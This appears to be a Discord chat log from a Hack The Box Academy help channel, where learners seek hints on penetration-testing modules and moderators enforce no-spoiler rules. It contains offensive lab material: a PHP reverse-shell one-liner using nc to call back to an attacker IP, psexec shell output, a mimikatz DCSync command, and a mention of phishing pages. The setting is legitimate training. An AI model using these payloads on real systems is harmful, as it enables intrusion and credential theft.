#modules

i consider this a both valid and satisfying answer , good night 😂

don't use kali so i couldn't say any major or minor differences

I really want to try out arch

Or "commando vm"

Looks funky

ill try out the command on pwnbox for peace of mind

i just used it because my friend who is doing the oscp uses it , no particular reason

make sure to turn off the vpn on your system

OSCP basically requires you to use kali for the exam

while yes you can use another OS, they don't provide technical support for other OS, since Kali is their own OS

im gonna keep using kali if that's the case , if the cpts wasnt HR friendly in my country i might take the oscp

the exam voucher not the full course

gotta troubleshoot the problem im having if thats the case

i mean either way OSCP is gonna cost ya $1700

the voucher is 600$ i think my friend told me

haven't seen anywhere for that

but this is getting off-topic

i think your right i cant find anything related

#careers-and-certs

Thank you for your time marciel

you're chasing a unicorn

?

you're chasing a unicorn

#rules no one is selling or buying things here

don't make me tap the sign

i deleted your message the first time

it has 0 to do with https://academy.hackthebox.com

the only thing we're buying is modules 🙏

type shi

for those that may have been wondering how i organize things in canvas; this is for the nibbles sections of the Getting Started module
Color Coding

• Green - question
• Blue - Info
• Orange - Potential Vulns
• Yellow - Flags
• Red - exploit vulns/vector and user/root access
• Lime is leaps in logic

AD Attacks - Domain Trusts: Child to Parent (Linux)

Did the Golden Ticket, exported the .ccache file, and impacket-psexec works fine:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 172.16.5.5.....
[*] Found writable share ADMIN$
[*] Uploading file CKaNBMZk.exe
[*] Opening SVCManager on 172.16.5.5.....
[*] Creating service GHZv on 172.16.5.5.....
[*] Starting service GHZv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> 

But I can't get Netexec to work:

SMB         academy-ea-dc01.inlanefreight.local 445    ACADEMY-EA-DC01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         academy-ea-dc01.inlanefreight.local 445    ACADEMY-EA-DC01  [-] INLANEFREIGHT.LOCAL\ from ccache KDC_ERR_C_PRINCIPAL_UNKNOWN

What am I missing here?

--use-kcache is separate from -k iirc

I've only used --use-kcache ?

Wait, how do you PTT via Netexec then?

I mean there's a -k flag in nxc

-k flag is for credentialed auth in Kerberos, not ticket auth.

I'm following its Wiki

it is? I never had to put in credentials when I used it before

Okay, I don't get this:

SMB         LOGISTICS.INLANEFREIGHT.LOCAL 445    ACADEMY-EA-DC02  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC02) (domain:LOGISTICS.INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         LOGISTICS.INLANEFREIGHT.LOCAL 445    ACADEMY-EA-DC02  [+] LOGISTICS.INLANEFREIGHT.LOCAL\hacker from ccache (Pwn3d!)
➜  ad-enum nxc smb INLANEFREIGHT.LOCAL --use-kcache         
SMB         INLANEFREIGHT.LOCAL 445    ACADEMY-EA-DC01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         INLANEFREIGHT.LOCAL 445    ACADEMY-EA-DC01  [-] INLANEFREIGHT.LOCAL\ from ccache KDC_ERR_C_PRINCIPAL_UNKNOWN 

Its wiki says:

when using the option -k or--use-kcache, you need to specify the same hostname (FQDN) as the one from the kerberos ticket

But how do I auth to the parent domain?

-k uses kerberos authentication mechanisms which may prompt for credentials if no tickets are available to use

I've tried -k, --use-kcache, and combination of both just for good measure

but yeah weird NXC doesn't work when the same ticket works with psexec

maybe raise the issue on the nxc gh or gitlab whatever they're using now ¯_(ツ)_/¯

why aren't you supplying a username?

:P you at least need to supply that

in this you specified domain/user@server
but in nxc you just attempted to use the server without telling it the user you're trying to auth as

I don't think so, it's wiki uses just the flag:

https://www.netexec.wiki/getting-started/using-kerberos

hmm

¯_(ツ)_/¯

also trusts aren't always bidirectional

This one is

Anyway, the issue is with how the ticket is created with the impacket-ticketer

been a minute since i've done it but when it comes up in my cleanup i'll get back to you on it; trying not to pull myself in 20 directions

https://github.com/Pennyw0rth/NetExec/pull/510

It appears to be a bug in Netexec that prevents support for trust authentication.

nvm I'm really stupid. I just figured it out. Literally just had to read my question to see what the problem was..

redid my notes a bit decided to mess around on the Getting Started Skill Assessment, found an alt way in without metasploit 😎

a common sentiment around here

that module is above tier0 so avoid spoiling content and potential solutions😉

Sorry!! Won't happen again

taps the sign

but glad reading comprehension is always a solid issue in the hacking world... it's happened to me a fair few times
"root directory" vs "filesystem root"

or "authenticate to" instead of a direct "ssh, rdp to"

BWS

Bless you

hello

@fathom pendantI would like to ask

Is it that the entrance machine will be closed after 2 days?

yeah the pwnbox lasts 2 days

Yes

The lab has a timer as well it's not the full length of the exam time

I suggest instead of asking on discord consult with support

They do work on weekends

Good

Just at a lower capacity

They will be able to answer your questions

Is that the question here?

https://help.hackthebox.com/en/articles/9561479-academy-certifications#h_04fbc4f183

pwnbox lasts 4 days

ask a question

OK thanks

Anyway gl with your exam

When you hit "start exam" you have exactly 10 days [cpts, cwee, cape] or 7 days [cbbh, cdsa] to complete the exam and submit the report

please don't reveal information about higher tier modules

also the error is evident; you're trying to do this
ls -la cat /file
look carefully for your error 😉

so it is a typo for evidence that I have use the sqli to create the file

as my concern that it is permission denied

either way it's an advanced module; please consider rephrasing your question and redacting screenshots:
Spoilers would be

• anything you had to look for
• anything you had to do specifically to exploit
  other than that not sure how to help you since i haven't done this module

taps the sign

It is okay cuz I think it is error from the application itself

¯_(ツ)_/¯

lmao in all my goofing around on the nmap hard assessment; only triggered the alert 6 times +/- the alert when i curled the status page

Hey folks. I'm doing the knowledge check in the getting started of the penetration tester path. Its a getsimple target.
I have found the admin hash and am able to login to the box.
I have found a vulnerability with the theme template.
This is where I am stuck. I can confirm remote code execution with <?php system('id'); ?>
I cannot get a remote shell however.
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?> and i'm listening on my attack box with nc -lvnp 9443
When I reload the theme and refresh the site, the page doesn't load. Any hints what I might be missing ?

Did you replace 10.10.14.2 with your tun0 address

Thats it. I was using the eth0 address. Thank you.

WOW thnx, I used Stat TAB and then Hierarchy and the number of ARP Packets apear. Thnx have a nice day

BTW how can I earn HACKER level on HTB??? 😬

https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box

Hey Folks, has anyone completed this Job Role Path?

i have a question about the paid courses on HTB academy; are they of better quality than the free ones? The free ones feel like any random tutorial you can just find by using a search engine

I don't know what exactly are the free ones, but from what I saw with the Pentester Job Role Path yes the course is of a very high quality.

free ones cost 10 cubes and reward 10 cubes

it's not like they recycle content but better for the paid content. The reason the paid content is paid is because they are a higher level of understanding of a topic, and thus require more effort to create content for

and very much worth it

Hi all,
Can someone help me with the "Wired Equivalent Privacy (WEP) Attacks" in the "Skills Assessment"? (https://academy.hackthebox.com/module/185/section/1941)
In the last question it states "Connect to the WiFi network using the found key and retrieve the flag from 192.168.1.1". I am able to connect to the wifi, but I don't know how to find the flag at 192.168.1.1. Could someone help me? What am I looking for? How do I find it?

Hello! I'm doing the linux fundamental module and I'm on the user management section and I test the commands they teach on the target machine I did the "sudo cat /etc/shadow" and I got a message on the terminal "htb-student is not in the sudoers file. This incident will be reported." Does it mean I can get banned for this? I literally just copied the exercise? What does this mean?

no you won't get banned

that's a standard linux info message

just means that the user, for this lab, doesn't have sudo permissions

you won't always be able to replicate 100%

sometimes the examples are good for information, but won't be practiced on the lab

Okay, thanks! Got worried for a minute haha.

you won't get banned on academy unless you violate the terms of service

did you try logging in as bonni first?; you need to use the name not the IP

Got it, the standard linux info message is scary tho. Newbie like me can think it's HTB machine's own warning message.

yes I did. but but event is not generated..

i mean it is the machine's warning message, technically

so when you attempted with bonni's credentials, you tried against DC1.inlanefreight.local, not the IP of the DC

I tried against the IP of DC1

using the IP generates a different logon failure event, as it falls back on a different auth type

then you did the wrong thing

:)

okay... great.. I try this ..

can you explain this more??

@fathom pendant : this error is generated.

i mean it's as simple as that

just use DC1 instead

not the fqdn

i misspoke on that one

instead of going through kerberos authentication (server), it falls back on windows authentication (local)

since you're connecting specifically to an IP and not a named device on the network

(even though they're the same device)

Yes i did..

which is why it can fail faster lol

because it doesn't reach out to the krb server

okay great.. thank you @fathom pendant

can someone help me am trying to learn a bit about linux fundamentals and am stuck at a question on directorys hares the question What is the name of the hidden "history" file in the htb-user's home directory? how do i find it

ls --help

one of the options there will help you discover all files, including hidden ones

thx 🙂

alternatively man ls

i have in a module that have a ip site and i used the zaproxy to enter in with hud and click on break
when i sent a request with ip=;ls; nothing is happens

when i see the responce i see only the html code and css

what is the module and section name

Please, if someone has an idea, as I've been at this for many hours now and I'm running low on ideas

https://academy.hackthebox.com/module/110/section/1048

Basically the question says what to do. Access the IP with a browser / curl / wget / python / whatever

i used burp for this instead of zap

fix this module pls: https://academy.hackthebox.com/module/51/section/1777

not sure what's broken

Thank you so much!!!! Worked with wget! I tried using curl, but the environment doesn't have internet access and doesn't have curl installed, no browser I could find and xdg-open didn't help either

is wget default on most linux systems?

yes

curl should also be default installed

Nice, I'll take note of that

I thought so too, but it's an unknown command to the machine and when I ssh to the machine it has no internet access, so I can't fetch it (tried, but it's not able to establish an internet connection to get it. Also unable to ping basic stuff like google etc. so felt kindda stuck). I was trying to get a remote desktop working over ssh to try and see if I could in that way get a browser

Hey. I'm at the XSS module on the skills assessment section.

I have a WordPress website with a search bar which reflects search input, I couldn't get a reflected XSS attack through that.
There's also a a post comment form, however not only does it pass through POST, but it doesn't cause stored xss since comments don't actually get uploaded.

Any clues?

i'm finding the correct answer on my end

not sure what needs to be corrected without you further explaining what your skill issue is

the search may be a red herring

RDP over SSH? All the targets for the WIFI modules have RDP exposed.

It looks like he's purged the site, maybe it's my problem

?

I see. Yeah I thought about the comments mainly, only thing I got is a call through a specific parameter, but how can I send a malicious link to perform that request when it's a post request?

I see the site like this, I can't continue with the form

you can't post screenshots in this channel without linking your account

the request type doesnt matter

the page loads fine for me, disable adblock or any extensions and refresh the page with ctrl+shift+r

Meaning I can send the parameters with a get request too?

ye

but that really doesn't change how you'd test for the right payload

you just do the multi-form test that one of the sections taught you how to do

and work from there

No yeah, I got a blind injection

work off that 😉

read the question VERY carefully

it's asking for the flag COOKIE

Very cookie.

True, through the browser, but that machine is different from the one the task wants you to ssh to. It is not on the correct network and doesn't have the files that the tasks reference to. To get to them you have to get the vpn file to enter the network and then ssh to the correct machine (which is kind of a hassle)

What are you talking about? You connect to the VPN and then you can RDP to the machine (it even says so above the question).

I did all those modules and did not even use SSH once

just ran through and it works as expected with the right payload

I have a payload, problem is its in a post request.

How did you RDP to the machine? Through the Pwnbox on the site? If so how?

I used my own VM connected to the VPN. Then spawned the target in the section and used xfreerdp /u:wifi /p:wifi /v:<TARGETIP> to access the target. In case you use the pwnbox, you don't need the VPN and can RDP right in.

you're focusing on the wrong thing

the session hijacking portion has all the info you'll need

i didn't make or modify any bits of payload *aside from port

just copy/pasted

why this is happening? I run same command as mentioned in module.

Looks like you are running the command in the wrong context. The user does not have the necessary permissions for DCSync

privilege::debug

Ohh I got it 🙏 @fathom pendant

But who's cookies did it get, I haven't understood that part.

read the webpage

Then what should I do? they gave me only this account

Ahhh.

😉

That's why
Thanks man @fathom pendant

this is why you need to pay attention to the full context; and not just narrow in

You're right 😉

can you run as admin?

(also helps to provide the module and section name)

Ah okay, I've been trying to use their pwnbox (as I'm in the process of setting up an old laptop with linux for future use). Though with pwnbox I still need the vpn as the pwnbox itself is not on the same network as the spawned target

yes it is

the pwnbox absolutely spawns with the same vpn config you selected

that's how it works

I get the message "ssh: connect to host 10.129.231.118 port 22: No route to host". From arp-scan it doesn't appear in the list

that's odd

you're using the academy pwnbox yeah?

it's been my biggest problem through out hackthebox courses

Yes

i'd reach out to support tbh

because i've never had that issue

Yes I am but still same issue.

Module Name : Windows Attacks & Defense
Section: Golden Ticket

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

privilege::debug

okay thanks, I did think it was odd that I had to do it in such a convoluted way

How?

I am working on the ExtarSids attack from the AD module and I created a golden ticket but cannot go across domains with Mimikatz like the module says I should be able to. Whenver I run lsadump::dcsync /user:INLANEFREIGHT\lab_adm in mimikatz I get an error

in mimikatz

@fathom pendant

How did you solve the previous section? Re-read that one and you should have the necessary credentials

Man, some of these modules are getting difficult.

You haven't even scraped the hard ones

Since the job role path for the basic exams top out at t2, the advanced at t3

Thank you!

Well it’s partially that I’m just getting used to some of these commands.

Hi. I was working on AD Enum and Attacks - Privilege Access. For the MSSQL quertion. I was not able to ssh to the Linux attack box. I was planning to use mssqlclient. I grabbed the flag, but from the Windows box. Is this the intended way?

I can't ssh to ACADEMY-EA-ATTACK01. It is not accepting the given password.

Hey gang - pulling my hair out at the skills assessment for win lat movement.

Can't connect to the VNC server on backup host. Followed the solution and still can't figure it out.

Any help is appreciated.

Got all my phishing pages set damnn took me years 😭😭

Hack the box is fake fr never teaching you how to make money smh

cringe asl

How is it fake? We provide the teaching material and environment to learn the skills you need in order to break in to the field of security. The step of making money with that knowledge, that's up to you I'm afraid, but it usually involves looking for open positions of relevance, or working on bounty programs.

We're open to feedback always, but "it's fake".. 🤷‍♂️

he's trolling

You don't say

Never hurts to ask

he wants to sound edgy or something

i don't think you'll get anything remotely constructive coming out of him tbh

No, neither do I, but if they are expecting HTB to provide knowledge how to make money through unethical means, and respond as such, then we know.

Of course they won't respond like that now, now that I've said that

but I'm assuming as much 🤣

lmao

Hey guys, I need some help here. Although it may be a silly question, I actually consider it to be a trick question. It is about the module: introduction to penetration testing.
the question is: which domain of testing is the most fundamental for every penetration tester (format: three words)
but I really consider that cannot be answered with just three words

Anybody know where I can get help with the web fuzzing module??

here, just ask your question

PKI - ESC1
Then we can execute the openssl command mentioned in the output of Certify.

user @htb[/htb]$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

i didnt enter this command i have answer like this
could not read private key cert.pem

@brazen knot Try to ask your question without showing content of the module. That said, make sure you perform all the steps. Looks like you didn't set your payload in metasploit. you didn't post how you created the payload so make sure that's correct too.

Hello would anyone be able to help me with this not sure what I'm doing wrong tbh I cannot pull up the website I'm also still new to Cybersecurity.

Navigate to the bottom of this section and click on Click here to spawn the target system!

Now, navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard".

thank you

open vpn

sorry about that, it was because i didn't set the payload on ms, thank u!

Hi Guys has anyone done Advanced XSS and CSRF Exploitation Skills Assessment, i am stuck on that for days, or does anyone knows where i can get hint, Thanks in advance.

what's your question

please refrain from posting content from the module and just ask your question

you error said url not found, try the full url

Alright noted

If i use the full url i don't a call back from the victim

i'm not sure it matters, but usually people use the exfil server i think

I don't know if i am not supposed to host the payload on my exploit server, i tried hosting on my local http python server, but still not working

I would review your payload, i think it's missing some things like the msg var

Don't have a definitive answer for you, but could be something as simple as the permissions available to the user you're authing as.

What do you recommend for those who are starting out in the world of cybersecurity, I want to study through hack the box.

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Thanks!!!!

Hi, sorry for disturbing, any hint?

Is it possible to become a good blue team in the world of hacking/cybersecurity, using the hack the box platform for free?

I'd advise re-reading the module / section content. That is a tier 3 module, and hints, spoilers or other such is not permitted (read the channel subject)

Same to you @rustic sage, please.

There's an amount of blue team content available, I can't say honestly how much, but it's spread across Academy and the Labs IIRC. For free? Not sure about that, depends on prior experience and how you are with using the knowledge available to you I suppose.

But you can at the least get an idea for what the role may entail

Oh okay, thanks!

https://www.hackthebox.com/blue-team-upskilling

I thought it is permitted to get little hint when you get stuck on something, there is definitely something i am doing wrong, i have solved all the lab without getting help from anywhere, and on this i have done the difficult part by exploiting the client side open redirect to promote my user, i just need a little help, i thought that's the main reason for this channel.

Right, I'm just saying spoilers etc, not allowed. Someone may give you a nudge, or get you to ask yourself the right questions to get to the answer (which I suppose comes under indirect hints)

Just wanted to clarify about the direct hints and spoilers part

SuperNuts already gave you a bit of a hint also

If you're still uncertain, the best advice I can give is to give the material another read over, see if you missed something

Alright

Hey ya'll im new here and to Linux. Getting the foundations down with Python and linux in between days of gaming etc. But as I am now over halfway through the linux fundamentals there are so many tools and commands and switches this seems like a ton to commit to memory. would it be worth making written notes or just stick with knowing the -h and man commands for said tools?

i'd strongly suggest making good notes. also writing stuff down helps with memory retention immensely.

you will practise and remember the ones that you used the most often for the ones you use rarely make good notes

Ok cool appreciate the input. I have noticed the deeper I've gotten the more I have went back and lookes at older commands and tools. Even went out to look up other ways of searching for certain files (Not the answers directly).

hi guys i'm trying to upload a file from window powershell to my kali linux through Raven. Powershell return an error

Exception calling "GetResponse" with "0" argument(s): "The underlying connection was closed: The connection was closed
unexpectedly."

listen on 0.0.0.0

i still have the same error

do i need to change something in the scripts of raven ? or is there something i'm doing wrong ?

maybe

test with curl locally

i can do the upload from a web browser when i go to the ip

anyone can help me in the File Upload Skill Assessments? im doing the XXE to grab the content of upload.php but only I receive the 500 code

Why are you adding another url?

i'm wondering why i cant make the upload from powershell with raven but it work with the browser

I put it because I saw it in a blog, when I put the script.js if I get the answer in base64 but when I want to enter a folder and see the upload.php file I can never see it.

But isn’t script.js publicly accessible?

They give you the example in the module

You’re already in the contact directory

Just specify the upload.php

that's a tier 2 module guys

I feel like an idiot, I never thought I would be in the directory, I didn't even try it, I went straight to it without doing it, thank you.

the attack box has separate creds from the windows box

@safe star can I dm u for no spoilers here for the final part of the File Upload ?

yheah

I text u

find / -type f -user root -name *.conf -size -28k -size +25k -newermt 2020-03-03
hey, is there something wrong with my command line? I get "permission denied"

Add 2> /dev/null to the end

Whenever you do a recursive search through filesystem root, you need to add that -- otherwise you'll get flooded with errors for one reason or another

Permission denied == you don't have the right user or group privileges to see something i.e. /root/

hmmm I dont know why it didnt work the first time... now it did. thanks!

it did work the first time;
2> is an error redirect
/dev/null is the void of linux
2> /dev/null redirects the errors to the linux void

https://academy.hackthebox.com/module/115/section/1106

last question i get the shell and hostname MS.. and its telling me wrong answer

is it bugged?

no i got a different answer

make sure you're connected to the right target

should be a win 10 computer

tf

also don't post spoilers please

my bad ill reset target something prob wrong with vm

i think it spawned a box from a previous module which is weird

where are those? I do not see that being mentioned anywhere

yup i reset the box and its a complete different box idk what happen there lmao

Intro page gives creds, along with any of the linux based sections

hi

I have consistent RDP issues with the Unconstrained Delegation - Computers section of the Kerberos Attacks module. I have had issues connecting from my own personal vm and then using the pwn box. Anyone experiecing the same?

are you on the vpn at the same time you have the pwnbox spawned?

i am, but i can hop off and retry if that messes up anything

that's why. the pwnbox uses the same vpn as your vm. it's gonna cause conflicts with 2 devices competing for the same IP.

use one or the other

kk retrying now..

having same issue i had from my personal box

After shutting down the pnwbox i'd probably restart the target and reconnect to the vpn for good measure then try ~5 mins after respawning the target

im sorry. i wasn't clear. I mean i tried from the pwnbox and got that error. I'm restarting everything though. the target and pwnbox and will try from the pwnbox one more time.. but tbf, this is the same issue last week -- but ended up moving on to another module in its stead 😦

if it continues then i'd try changing regions ie. US -> EU or vice versa

I’m on the same module and section and it is working fine for me

Not gonna lie. HTTP smuggling is making me cry

Just put the http in the bag bro…

just put the request in the bag bro

Did it get intercepted?

What is the FQDN of the host where the last octet ends with "x.x.x.203"? Does anyone know how to solve this? I tried brute force cracking, but got no results. It's so frustrating.

Brute force tools will work

It's on a subdomain of a subdomain, make sure to thoroughly enumerate

Fuckin scam bot

Could you please tell me which tool I should use?

the section gives you a tool to use

¯_(ツ)_/¯

you can specify a sub.domain.htb

ok,let me try,thanks

i would double check you have all the sub.domains via dig first before trying each out

it will take a few minutes to go through

hi there all! does anyone have an issues on sliver-c2, using chisel on their own vm? When I create the extensions, the chisel version states 0.0.0-src and the VM version is 1.10.1.I have tried compiling the .dll's manualling and editing the version but this didn't seem to work? Just seeing if anyone else had something similar?

<@&861185840277487616>

A bit of a weird issue. Tho i'm currently on Attacking Common Applications module on the PRTG section.

The issue is I'm trying to fuzz different password for the found username, however after about 50 request the application almost become non-responsive. I've re spawned the machine multiple times tho every time after about 50 requests the same issue occurs. Any insights on how to go about this?

I've even tried to fuzz at 1 thread but the same results follow.

Question: Attack the PRTG target and gain remote code execution. Submit the contents of the flag.txt file on the administrator Desktop.

you're overthinking

i believe it's default creds, could be wrong though

I've found the credentials they were the same from the module (not the default ones, but from the example), however if the same scenario happens in the exam how should one go about it then?

figure it out; you won't have any examples to go off of in the exam

Yep that's what I'm trying to do. Might be a built in protection in the tool as far as I can tell as it takes exactly 50 requests each time to become unresponsive

¯_(ツ)_/¯

you can always look back at examples during the exam

I moreso meant you don't have an in-exam example, like the modules

Where you can just grab and use

the in exam examples are the modules

Not what I'm meaning at all

What i mean is:
there's no sample credentials you can use or look to
Just hand crafted or otherwise pilfered lists

you mean they expect me to think and gather my own ideas? how dare they

Estimated time shown for each module.
For example if it is 3 days, is it 3 * 24 = 72 hours?
Edit: I think this has been asked earlier. Is it 8 hours?
I have a habit of prolonging completion by going deeper than necessary. I am thinking to complete within the estimate so just a rough measure will also help.

Alright seems like that's the case after 50 incorrect login attempts on the application it delays the response time to 35 seconds:
Source: https://kb.paessler.com/en/topic/25523-what-is-overload-protection

Perhaps when the module was being tested the wordlist in use didn't get to 50 request hence the issue was nuance was overlooked

35 seconds check out to be correct as well:

I genuinely recommend ignoring the estimated times, but yes it's 8 hours

Ok so I'm on this question

Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.

I ran the hasher upload_win.txt from command prompt, however the hash i got is still not the correct answer

your upload method might have corrupted the file

yeah i used ftp

might try smb

awesome

awesome sauce

Hi! Im doing the Network Enumeration with Nmap module, Im having an issue with the level "Namp Scripting Engine", because I found the flag, but when I send it, it says wrong answer, (I know, maybe is another, but I made all and thats the only answer I found)

if you do echo "<put the flag here>" | md5sum does it match this result?
ac3133022316dc33acba9bcc62709d76

if not then you grabbed the wrong flag

it's on a common port; that's all i'll say

has any of you taken the famous privesc courses by tib3rius? How does the Linux Privesc module stack up against it? I'm going through it (HTB Academy's that is) right now and it feels like a rollercoaster I have to say

No it doesnt match :c Thank you so much!

it should go without saying you replaced the brackets as well with that?

you put echo "HTB{VALUE}" | md5sum

Yes, I did it exactly as its here

just making sure

https://tenor.com/view/2020who-overit-gif-19791586

https://tenor.com/view/where-am-i-lost-how-did-i-get-here-gif-18505152

Which module is that?

Oh… wrong chat

What?

Im still trying it, but I only see one answer, can I send you the port and the script for nmap im using where the answer is? (Obviously, in md5sum)

as i said it's a common port; it's not a crazy port

though the script that's run is shown in the example

I did agressive scan too, and I only see the same answer :_c

🕸️ 🤖

you'll need to do some manual enumeration after getting the script to run

fc* man I did it jajajaj

thanks!

Has anyone done HTTP attacks - skill assessment? I would like to have some direction.

No can attk

i cannot see endgames section in htb labs (i have vip subscription)

I am on a windows machine with admin access and I need to get the ntlm hash for a user but I don't have mimikatz or PowerView, I am stuck on how to do it?

Anyone that can assist with Windows Priv esc module - Pillaging please? Part with Slack. When I refresh the site with saved extracted cookie in the cookie-editor, I get nada. Am I missing something?

edit... I got it, it was me being dumb.. doh!

hello. i wanted to ask this in genral chat but i cant send messages there for some reason. i wanted to know if i could buy a hackthebox gift card directly from my paypal balance without connecting a credit card and if i could use said gift card to pay for a student membership (say being able to pay for 6 months membership with $50 gift card)

https://help.hackthebox.com/en/articles/5185500-what-payment-options-are-supported-and-do-you-store-payment-details
It's best to clarify your questions with the support team.
To be able to write in #general read and follow #welcome

Hi, i'm on the sqlmap essentials module and doing the exercises in the Attack Tuning section. Something I am struggling to understand is: When we have to use a custom prefix- how do we know what the prefix should be? do we guess a few? or where doe we need to look? this is the subject of question two in the Attack Tuning section

Gg

i think you meant to send that to the #bot-commands channel

And missing the / before identify

we all started somewhere i guess

DM

hey can some here can help me in cacade from htb?

I am stuck for more than an hour.

Best to ask in #boxes
If you have no access, read and follow #welcome

i don't have access

Read #welcome

Follow instructions. Three simple steps

Any advice

No one knows what prefix will work, you just try.

I usually use payloads all the things cheat sheet for this.
Look at their SQL payloads and make a list of possible prefixes

Ok thx

can somebody give me a hint for the file upload attack skill assessment been banging my head against this for weeks

did you get the upload.php source code?

nope thats what ive been trying i cant find the upload directory

from what i remember

• i first tried normal image that will succeed, captured the post request for this upload
• fuzzed in burp which content type is allowed which would allow me to leak the upload.php source. Review Limited File Uploads for this step

dm me if needed

I made sure there's no whitespaces or anything within the file

Don't include the hash, the ss of it saying encoding error would have been just fine

figured it out thanks for your help tho

Excuse me! i am doing information gathering web edition

@fathom pendant thanks, how do I know what to include? I remember there was something here

It's a t3 modules so anything you have to discover or find is a spoiler

oh right, i did include the entire thing..

my bad, havent posted here in a while!

ok here we go again..

could anybody help me with the kerberoasting module in active directory & enumeration & attacks?

currently stuck at the kerberoasting from linux part:

Why does everyone have that wallpaper?

Did you copy it correctly?

Or put it in a output file

well its the default wallpaper of xct "Kali clean"

I did it 1;1 like in the module. I exported it with -outputfile too..

Try pwnbox to see if it’s your hashcat

good idea, ill try that

Thank you @safe star that did indeed work

Excuse me, i am trying to understand the 3rd question in the skill assessment section in the information gathering web edition

i mean it's assuming i already found ADMIN directory

i didn't but

i tried to bruteforce the dir using gobuster and vhost using gobuster

also i tried to use the finalRecon automated tool

i pretty much tried So many different wordlists

i am still unable to find it

i tried to look if there is a robots.txt file, but i couldn't find any

i tried to crawl but it seems like in the main website, there is nothing to crawl so i need an initial subdomain or a vhost

since this is a custom vhost, it seems like there is no data about it online on whois or

an TLS/SSL certificate

not a transparent log

Doing: Passwords Attacks module, Section: Password Mutations. For the Question there, I used hashcat to create a "mutated" pwd list from the provided one. But ... "bruteforcing" against SSH, seems to take forever. What am I doing wrong? Or what do I not understand of the question? Any hint please?

are you on the vhost?

try a faster service

Ah of course. Silly me. Will try because this is gonna take a week LOL. Thanks for the push in the right direction.

what do you mean exactly?

the section?

no i am not at the vhost section, i am at the skill assessment one

that you need to find the virtual host

according to my understanding, yes, i need to find a vhost or a subdomain

first find the VHOST. Puit that in your hosts file and then gobuster dir -u

i am aware

but i tried all available wordlists

the shorter ones

i couldn't find a single vhost

i have the main vhost in the /etc/hosts file

take raft medium. Or try with ferox

did you use the wordlist in the section: subdomains-top1million-110000.txt

Or FFUF even

not the biggest, i did for the 20k one

Always the 110K one for vhosts

Its fast anyway. And a tip: use ffuf for vhost finding.

hmmmmm, i talked once with someone who said, focus on the smaller wordlists

finding = fuzzing

there shouldn't be a difference between ffuf and gobuster in this case tho no? maybe just speed wise?

speed indeed

ffuf is faster

100% ^^

why to use gobuster then? we can fuzz dir and subdomains in ffuf too

Yup

I tend to use ffuf more and more now.

not sure tbh

i think they just wanted that for the other module or something

sometimes tools will break so it's good to have a few of them you can use

i mean it was mentioned in the same module but i am just a little more familiar with gobuster now

plus sometimes different tools give different results

gobuster should work for you

well i just tried the bigger list, still failed

i don't know where are those, ferox or raft, in the DNS folder of the seclist, they don't exist

do i just download them online or they exist somewhere in the seclist?

/opt/SecLists/Discovery/DNS/sub.....110000 ...txt

yes that one, is done

did you --append-domain?

hmmmmm not now, let me do it now, i did it before i forgot to add it now

Or /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

ffuf -w ....... -H "Host: FUZZ.domain.com" -u http://domain.com

Something like that.

With gobuster you need to use both --append-domain and --domain DOMAIN

See? ffuf is easier. 🙂

yes yes thank you i am aware! in the -u flag, i am supposed to add the port as well since it's not a regular port

right?

yes

yeah... i am still unable i used ffuf

seems like it's a wordlist issue

did you add the port to ffuf?

unless somehow there is a problem in the /etc/hosts file

yes absolutely

i added it like :port

dont add the port to the hosts file

i didn't

Eh.. no

the website now is accessible under the correct name

only problem is that i am not finding the vhost when i am enumerating

nor any dir if i did a directory enumeration

using the common.txt wordlist

can you dm the command

Why not just show your command and hosts file 🙂

I never use that one

ffuf ftw, also feroxbuster is cool 🤓

you could try to put the expected vhost/directory in a txt file use it as a wordlist just to see if your tools are working correctly

to me Ferox is a bit messy. Probably ignorance or personal dislike.

yeah i get where you're coming from. ferox is fun for quick subdomain/directory discovery

Hi

if you really need to dig i prefer ffuf

Can anyone hack

I use Ferox to double check results from ffuf or gobuster, when I dont trust the results.

No, we can't.

Why can't you I can

You can? Great man.

Thx

Why not the subdomains-top1million-110000.txt wordlist?

Hey, I'm kinda stuck in getting started public exploit module. I've visited the webpage and run the only exploit that was listed for the plugin. It produced a loot file. I'm kinda lost at what to do with said file.

I think you're on the wrong server. Be sure to read the #rules

we already said. so I have no idea why not.

Can you provide a picture?

Yeah we seem to be more passionate about solving his module than him

of the loot file?

Output of the exploit running

Alright, take a look at the loot file.

Cool. A backup file as loot is always good.

Look at the last file extension: It's a .txt file

and to double-check, use the file command. 🙂

Are these web page folders? I've tried most of them with no success

Did you look at the .txt file you got?

Yes, a list of folders I think

Hey, is this where i can get hints to questions?

Let me quickly look at the module.

For HTB Academy modules, yes.

can you show it in a DM? I cannot start that module as I have another one running.

Okay.. Uhh I feel dumb.. I'm stuck on module/112/section/1067 - host based enumeration/SMB. I can't find the version of the SMB server that's running. After nmapping I get an outcome and I paste it (the question told me to submit the entire banner so I did) and it doesnt work. I have every other question correct..

what was the target file?

Let me look.

thx

what is module 112 btw? Hahaha.

Try using --script banner

Got it. Pasted it in the URL

There's also other enumeration methods for smb

Doing it from vpn gives weird results

Try with pwnbox

It is 2 words and a version number

Stop your vpn when you use pwnbox btw

